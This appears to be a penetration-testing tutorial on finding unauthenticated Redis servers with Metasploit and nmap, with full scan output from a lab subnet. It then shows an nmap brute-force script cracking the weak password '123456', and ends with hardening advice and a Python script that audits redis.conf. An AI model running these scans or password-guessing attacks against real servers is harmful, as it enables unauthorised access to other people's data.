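Redis in its default configuration has no access restrictions, and a large amount of system information can be obtained through it.
1. Batch-scanning for Redis servers with msf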
msf > use auxiliary/scanner/misc/redis_server
msf auxiliary(redis_server) > set RHOSTS 192.168.73.0/24
RHOSTS => 192.168.73.0/24
msf auxiliary(redis_server) > set THREADS 10
THREADS => 10
msf auxiliary(redis_server) > run
[*] Scanning IP: 192.168.73.6
[*] Scanning IP: 192.168.73.4
[*] Scanning IP: 192.168.73.7
[*] Scanning IP: 192.168.73.3
[*] Scanning IP: 192.168.73.8
[*] Scanning IP: 192.168.73.9
[*] Scanning IP: 192.168.73.2
[*] Scanning IP: 192.168.73.1
......omitted......
[*] Scanning IP: 192.168.73.130
[*] Redis Server Information $1908
# Server
redis_version:3.0.0
redis_git_sha1:00000000
redis_git_dirty:0
redis_build_id:715d8a91e5cdbe8e
redis_mode:standalone
os:Linux 2.6.32-131.0.15.el6.x86_64 x86_64
arch_bits:64
multiplexing_api:epoll
gcc_version:4.4.5
process_id:2582
run_id:4c0b8728104158f8090a2591525d3aa49acbbc94
tcp_port:6379
uptime_in_seconds:51800
uptime_in_days:0
hz:10
lru_clock:4811114
config_file:/etc/redis.conf
# Clients
connected_clients:1
client_longest_output_list:0
client_biggest_input_buf:0
blocked_clients:0
# Memory
used_memory:815944
used_memory_human:796.82K
used_memory_rss:7950336
used_memory_peak:815944
used_memory_peak_human:796.82K
used_memory_lua:35840
mem_fragmentation_ratio:9.74
mem_allocator:jemalloc-3.6.0
# Persistence
loading:0
rdb_changes_since_last_save:0
rdb_bgsave_in_progress:0
rdb_last_save_time:1430822674
rdb_last_bgsave_status:ok
rdb_last_bgsave_time_sec:-1
rdb_current_bgsave_time_sec:-1
aof_enabled:0
aof_rewrite_in_progress:0
aof_rewrite_scheduled:0
aof_last_rewrite_time_sec:-1
aof_current_rewrite_time_sec:-1
aof_last_bgrewrite_status:ok
aof_last_write_status:ok
# Stats
total_connections_received:1
total_commands_processed:1
instantaneous_ops_per_sec:0
total_net_input_bytes:12
total_net_output_bytes:7
instantaneous_input_kbps:0.00
instantaneous_output_kbps:0.00
rejected_connections:0
sync_full:0
sync_partial_ok:0
sync_partial_err:0
expired_keys:0
evicted_keys:0
keyspace_hits:0
keyspace_misses:0
pubsub_channels:0
pubsub_patterns:0
latest_fork_usec:0
migrate_cached_sockets:0
# Replication
role:master
connected_slaves:0
master_repl_offset:0
repl_backlog_active:0
repl_backlog_size:1048576
repl_backlog_first_byte_offset:0
repl_backlog_histlen:0
# CPU
used_cpu_sys:2.21
used_cpu_user:1.04
used_cpu_sys_children:0.00
used_cpu_user_children:0.00
# Cluster
cluster_enabled:0
# Keyspace
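The scan shows that Redis is installed on host 192.168.73.130 with no access restrictions, so further system information could be gathered, which helps with subsequent penetration-testing steps.
2. Another way to get the information: nmap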
root@kali:~# nmap -p 6379 192.168.73.130 --script redis-info.nse
Starting Nmap 6.47 ( https://nmap.org ) at 2015-05-05 21:30 EDT
Nmap scan report for 192.168.73.130
Host is up (0.00025s latency).
PORT STATE SERVICE
6379/tcp open unknown
| redis-info:
| Version 3.0.0
| Operating System Linux 2.6.32-131.0.15.el6.x86_64 x86_64
| Architecture 64 bits
| Process ID 9172
| Used CPU (sys) 0.03
| Used CPU (user) 0.00
| Connected clients 1
| Connected slaves 0
| Used memory 796.82K
|_ Role master
MAC Address: 00:0C:29:8C:1C:BB (VMware)
3. Probing again with msf after configuring an access password
In redis.conf, find the "requirepass" directive and put the desired password after it, for example:
#
requirepass 123456
#
Run msf again:
msf auxiliary(redis_server) > run
[*] Scanning IP: 192.168.73.130
[-] 192.168.73.130 does not have a Redis server
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
The probe fails.
4. Probing again with nmap after configuring an access password
root@kali:~# nmap -p 6379 192.168.73.130 --script redis-info.nse
Starting Nmap 6.47 ( https://nmap.org ) at 2015-05-05 21:33 EDT
Nmap scan report for 192.168.73.130
Host is up (0.00030s latency).
PORT STATE SERVICE
6379/tcp open unknown
| redis-info:
|_ ERROR: Authentication required
MAC Address: 00:0C:29:8C:1C:BB (VMware)
The probe fails.
5. Nothing stands in the way: cracking the Redis password with nmap
root@kali:~# nmap -p 6379 192.168.73.130 --script redis-brute
Starting Nmap 6.47 ( https://nmap.org ) at 2015-05-05 22:13 EDT
Nmap scan report for 192.168.73.130
Host is up (0.00033s latency).
PORT STATE SERVICE
6379/tcp open unknown
| redis-brute:
| Accounts
| 123456 - Valid credentials
| Statistics
|_ Performed 11 guesses in 1 seconds, average tps: 11
MAC Address: 00:0C:29:8C:1C:BB (VMware)
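The password was cracked successfully: 123456
Configure a strong password, 15 characters or more is recommended. This does not prevent brute-force attacks; it only makes cracking harder.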
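As an added example (not part of the original post), the Python check below audits a redis.conf for the two conditions shown above: no active requirepass, and a password short or common enough to fall to a dictionary the way 123456 did. The function name audit_requirepass, the sample configs and the small password list are assumptions made for illustration; the 15-character threshold is the post's own recommendation.

```python
import shlex

MIN_LEN = 15  # minimum length recommended in the post
# Constructed sample of dictionary passwords; "foobared" is the placeholder
# shown in the commented-out requirepass line of the stock redis.conf.
COMMON = {"123456", "12345678", "password", "redis", "admin", "foobared"}


def audit_requirepass(conf_text):
    """Return (effective_password_or_None, list_of_findings) for a redis.conf."""
    password = None
    for raw in conf_text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue  # blank line or commented-out directive: not active
        try:
            parts = shlex.split(line)  # handles quoted values
        except ValueError:
            continue  # unparseable line (unbalanced quotes): skip it
        if len(parts) == 2 and parts[0].lower() == "requirepass":
            password = parts[1]  # directives are read in order; the last one wins
    findings = []
    if not password:
        findings.append("no active requirepass: any client can run INFO")
        return password, findings
    if password.lower() in COMMON:
        findings.append("password is in a common-password list")
    if len(password) < MIN_LEN:
        findings.append("password shorter than %d characters" % MIN_LEN)
    if password.isdigit() or password.isalpha():
        findings.append("password uses a single character class")
    return password, findings


# Constructed sample configs mirroring the states discussed in the post.
DEFAULT_CONF = "port 6379\n# requirepass foobared\n"
WEAK_CONF = "port 6379\n#\nrequirepass 123456\n#\n"
STRONG_CONF = 'port 6379\nrequirepass "q7V-hT2m_Lx9@eRw4ZcB"\n'

if __name__ == "__main__":
    for name, conf in [("default", DEFAULT_CONF), ("weak", WEAK_CONF),
                       ("strong", STRONG_CONF)]:
        _, findings = audit_requirepass(conf)
        print(name, "->", findings or ["ok"])  # the password itself is never printed
```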